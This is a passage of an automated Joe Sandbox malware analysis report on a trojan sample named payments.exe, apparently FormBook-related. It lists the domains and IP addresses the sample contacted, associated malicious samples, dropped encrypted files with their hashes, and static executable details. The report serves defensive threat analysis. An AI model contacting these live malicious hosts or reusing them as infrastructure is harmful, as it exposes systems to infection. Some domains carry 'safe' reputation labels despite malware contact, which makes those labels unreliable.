                                                                                                          http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=nspcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://ac.ecosia.org/autocomplete?q=pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.matteicapital.online/Angel_Investors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1Spcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.3kw40881107247y.clickXhwUfLdILQipZF.exe, 00000006.00000002.3803049222.00000000056B4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://i3.cdn-image.com/__media__/js/min.js?v2.3pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.Matteicapital.onlinepcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.onlinepcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown

                                                                                                                        World Map of Contacted IPs

                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs

                                                                                                                        Public IPs

                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        209.74.77.109
                                                                                                                        		www.gogawithme.liveUnited States
                                                                                                                        		31744MULTIBAND-NEWHOPEUSfalse
                                                                                                                        146.88.233.115
                                                                                                                        		smartcongress.netFrance
                                                                                                                        		53589PLANETHOSTER-8CAfalse
                                                                                                                        8.210.114.150
                                                                                                                        		www.llljjjiii.shopSingapore
                                                                                                                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                        104.21.58.90
                                                                                                                        		www.bser101pp.buzzUnited States
                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                        199.59.243.227
                                                                                                                        		www.acond-22-mvr.clickUnited States
                                                                                                                        		395082BODIS-NJUSfalse
                                                                                                                        208.91.197.27
                                                                                                                        		www.matteicapital.onlineVirgin Islands (BRITISH)
                                                                                                                        		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                        104.21.62.184
                                                                                                                        		www.questmatch.proUnited States
                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                        38.47.232.124
                                                                                                                        		70kdd.topUnited States
                                                                                                                        		174COGENT-174USfalse
                                                                                                                        172.67.192.207
                                                                                                                        		www.3kw40881107247y.clickUnited States
                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                        161.97.142.144
                                                                                                                        		www.54248711.xyzUnited States
                                                                                                                        		51167CONTABODEtrue
                                                                                                                        103.21.221.87
                                                                                                                        		rtpterbaruwaktu3.xyzunknown
                                                                                                                        		9905LINKNET-ID-APLinknetASNIDtrue
                                                                                                                        47.76.213.197
                                                                                                                        		www.ytsd88.topUnited States
                                                                                                                        		9500VODAFONE-TRANSIT-ASVodafoneNZLtdNZfalse
                                                                                                                        185.27.134.206
                                                                                                                        		www.canadavinreport.siteUnited Kingdom
                                                                                                                        		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                                                                        194.85.61.76
                                                                                                                        		www.mrpokrovskii.proRussian Federation
                                                                                                                        		48287RU-CENTERRUfalse
                                                                                                                        172.67.209.48
                                                                                                                        		www.ampsamkok88.shopUnited States
                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                        General Information

                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1560289
                                                                                                                        Start date and time:2024-11-21 16:19:16 +01:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 10m 36s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                        Run name:Potential for more IOCs and behavior
                                                                                                                        Number of analysed new started processes analysed:10
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:2
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:payments.exe
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/3@19/15
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 75%
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 96%
                                                                                                                        • Number of executed functions: 53
                                                                                                                        • Number of non-executed functions: 301
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                        Warnings

                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                        • Execution Graph export aborted for target XhwUfLdILQipZF.exe, PID 6004 because it is empty
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        • VT rate limit hit for: payments.exe

                                                                                                                        Simulations

                                                                                                                        Behavior and APIs

                                                                                                                        TimeTypeDescription
                                                                                                                        10:20:56API Interceptor11868603x Sleep call for process: pcaui.exe modified

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        209.74.77.109A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.dailyfuns.info/n9b0/
                                                                                                                        199.59.243.227DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.bcg.services/mxde/?KV=8xKxkpsUUE6O2YGNwLnJ/+WM1qqfoI8NOsOkZIrS/NSsfWu+QjWct9+gZKiyGOAYB5Pljgx8M21MT9QArezJJe5Vce6MQIBegnnKKN1EkLTSu1v+eqsUQ+w=&Wno=a0qDq
                                                                                                                        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.bcg.services/xz45/
                                                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.dating-apps-az-dn5.xyz/pn0u/
                                                                                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.bcg.services/5onp/
                                                                                                                        Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.migraine-massages.pro/ym43/
                                                                                                                        http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                        • ww88.inscrit.es/_tr
                                                                                                                        http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                        • ww88.inscrit.es/_tr
                                                                                                                        BlgAsBdkiD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.adsdomain-195.click/q3rc/
                                                                                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.migraine-massages.pro/ym43/
                                                                                                                        statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.vnxoso88.art/d26j/
                                                                                                                        208.91.197.27DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.614genetics.online/me88/?KV=q4gJP+3oagrN9CKx8rfxsUGQTP5gFdbCqSnsSAovlnmOs/6LoBJM5Gt+ZeI5OsVhXMd6KM7YnqTd6M8YysOllc/dqLONIyR3l/1k9rdJVwtuEJXWvL6OrMc=&Wno=a0qDq
                                                                                                                        Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.yushaliu.online/fjsq/
                                                                                                                        PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.fedegaritech.online/sxrn/
                                                                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.crochetpets.online/5pe6/
                                                                                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.yushaliu.online/fjsq/
                                                                                                                        DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.fedegaritech.online/c6cn/
                                                                                                                        statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.yushaliu.online/fjsq/
                                                                                                                        Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.rimberiokitchen.online/xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM
                                                                                                                        Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                                                        • www.fedegaritech.online/qiu8/
                                                                                                                        RFQ.docxGet hashmaliciousFormBookBrowse
                                                                                                                        • www.danceonwater.net/bbvc/

                                                                                                                        Domains

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        www.questmatch.proSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Rte_PRPay.docxGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        zc4x7OQkYB.dllGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.63
                                                                                                                        www.ytsd88.topQuotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 47.76.213.197
                                                                                                                        www.mrpokrovskii.proItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 109.70.26.37
                                                                                                                        www.canadavinreport.siteThermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 185.27.134.206

                                                                                                                        ASNs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        CLOUDFLARENETUSMandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 104.21.41.74
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                        • 162.159.61.3
                                                                                                                        http://xmrminingproxy.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.6.188
                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.66.38
                                                                                                                        VMX.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.198.61
                                                                                                                        Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                        • 104.21.15.40
                                                                                                                        https://spacardportal.works.com/garGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.18.86.42
                                                                                                                        ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.155.248
                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.219.199
                                                                                                                        Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                        • 172.67.161.101
                                                                                                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 47.244.139.234
                                                                                                                        Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 8.210.144.166
                                                                                                                        Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 8.210.144.166
                                                                                                                        cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 8.210.144.166
                                                                                                                        cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                                        • 8.210.144.166
                                                                                                                        mal.jsGet hashmaliciousUnknownBrowse
                                                                                                                        • 8.209.119.17
                                                                                                                        m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                        • 47.242.96.185
                                                                                                                        DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                        • 47.254.140.255
                                                                                                                        PHA AL PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 47.52.221.8
                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                        • 47.241.54.126
                                                                                                                        PLANETHOSTER-8CAhttps://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                                                        • 146.88.234.239
                                                                                                                        EVCPUSBND147124_MBL Check_revised.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                        • 199.16.129.175
                                                                                                                        Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 85.236.153.44
                                                                                                                        Remittance advice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                        • 199.16.129.175
                                                                                                                        https://serwer2464839.home.pl/imodzeb4Get hashmaliciousUnknownBrowse
                                                                                                                        • 146.88.233.222
                                                                                                                        3Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                                                                        • 146.88.232.72
                                                                                                                        https://gsdgroup.ca/Get hashmaliciousUnknownBrowse
                                                                                                                        • 199.16.129.142
                                                                                                                        http://amundsenscience.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 199.59.247.234
                                                                                                                        Hospital_Inquiry_List_3892892921.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                        • 146.88.237.40
                                                                                                                        PO_BCA08727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                        • 146.88.237.40
                                                                                                                        MULTIBAND-NEWHOPEUSMandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.77.108
                                                                                                                        http://mt6j71.p1keesoulharmony.com/Get hashmaliciousHTMLPhisher, EvilProxyBrowse
                                                                                                                        • 209.74.95.101
                                                                                                                        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.77.108
                                                                                                                        RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.77.107
                                                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.77.109
                                                                                                                        https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                        • 209.74.95.101
                                                                                                                        Order No 24.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.64.58
                                                                                                                        dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.64.187
                                                                                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.64.58
                                                                                                                        DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 209.74.64.59

                                                                                                                        JA3 Fingerprints

                                                                                                                        No context

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

                                                                                                                        C:\Users\user\AppData\Local\Temp\72Z53078

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\pcaui.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):196608
                                                                                                                        Entropy (8bit):1.1221538113908904
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                                        MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                                        SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                                        SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                                        SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\aut32B9.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\payments.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):288768
                                                                                                                        Entropy (8bit):7.994847236452791
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:6144:JseSGRW+iAkgzKiQWWW9oQEMjTpc3FvXwv5I3I5rRJIic3D:JseSGU+iqm5WGQS1vgvG4xR9iD
                                                                                                                        MD5:CC3B6A14C7B68CCCFAFCAB04B89A29E1
                                                                                                                        SHA1:9FA78D008443C7539C5D5B666351DE4A1EDA17CF
                                                                                                                        SHA-256:A5043E5BB7014021F6E70605B63ED504CFC8AE20F1CF939F02C8193D904EF9D0
                                                                                                                        SHA-512:72226B94E52C38423D7CE6317A1ED7511D316E079F1F43AB9DAF4BE0FF405BC1B168A178A7FB33C4B31BD7AD3DFF309BA23A8C8579B3B8EAE0BAAAA7A942797A
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:uo.HODAIK9WR..4J.HD85RHL.AIO9WR624J5HD85RHLDAIO9WR624J5HD85R.LDAGP.YR.;.k.I.... %7a9=V0 W_.)T&*WAr*)d3<!.><.v{..%+\P|EANeIO9WR62MK<.yXR.u,#.t/^.H...pU/."...p$&.U....RS.g!'P.2/.DAIO9WR6bqJ5.E95U..AIO9WR62.J7IO9>RH.@AIO9WR624.&HD8%RHL4EIO9.R6"4J5JD83RHLDAIO?WR624J5H4<5RJLDAIO9URv.4J%HD(5RHLTAI_9WR624Z5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR62.>P0085R..@AI_9WR`64J%HD85RHLDAIO9WR.24*5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR

                                                                                                                        C:\Users\user\AppData\Local\Temp\carryover

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\payments.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):288768
                                                                                                                        Entropy (8bit):7.994847236452791
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:6144:JseSGRW+iAkgzKiQWWW9oQEMjTpc3FvXwv5I3I5rRJIic3D:JseSGU+iqm5WGQS1vgvG4xR9iD
                                                                                                                        MD5:CC3B6A14C7B68CCCFAFCAB04B89A29E1
                                                                                                                        SHA1:9FA78D008443C7539C5D5B666351DE4A1EDA17CF
                                                                                                                        SHA-256:A5043E5BB7014021F6E70605B63ED504CFC8AE20F1CF939F02C8193D904EF9D0
                                                                                                                        SHA-512:72226B94E52C38423D7CE6317A1ED7511D316E079F1F43AB9DAF4BE0FF405BC1B168A178A7FB33C4B31BD7AD3DFF309BA23A8C8579B3B8EAE0BAAAA7A942797A
                                                                                                                        Malicious:false
                                                                                                                        Preview:uo.HODAIK9WR..4J.HD85RHL.AIO9WR624J5HD85RHLDAIO9WR624J5HD85R.LDAGP.YR.;.k.I.... %7a9=V0 W_.)T&*WAr*)d3<!.><.v{..%+\P|EANeIO9WR62MK<.yXR.u,#.t/^.H...pU/."...p$&.U....RS.g!'P.2/.DAIO9WR6bqJ5.E95U..AIO9WR62.J7IO9>RH.@AIO9WR624.&HD8%RHL4EIO9.R6"4J5JD83RHLDAIO?WR624J5H4<5RJLDAIO9URv.4J%HD(5RHLTAI_9WR624Z5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR62.>P0085R..@AI_9WR`64J%HD85RHLDAIO9WR.24*5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR624J5HD85RHLDAIO9WR

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):7.146295107031158
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:payments.exe
                                                                                                                        File size:1'213'440 bytes
                                                                                                                        MD5:63c1545a3e20b0dc33a010e441943d0f
                                                                                                                        SHA1:316d618c16be07f4783045b6e1d9be6cd516915b
                                                                                                                        SHA256:8d8c60a5a1bdde82ded1b5c433703d5f4b1063c102df9a5df34e963032cadf73
                                                                                                                        SHA512:4556cb51727fd81155028910ac6e1054b5036fdfaec8615ee7263e60d4a225f472e1ac132cb81537a7328a7ea44c56daccad09e685914200a78a495a06a9ca50
                                                                                                                        SSDEEP:24576:btb20pkaCqT5TBWgNQ7apH1IicrWkxpdNGlwEaGz56As:YVg5tQ7apVIi2/xUl+c5s
                                                                                                                        TLSH:9745CF1373DE8365C3B25273BA25B741AEBF782506B1F56B2FD4093DE920122521EA73
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                                                        File Icon

                                                                                                                        Icon Hash:aaf3e3e3938382a0

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x425f74
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
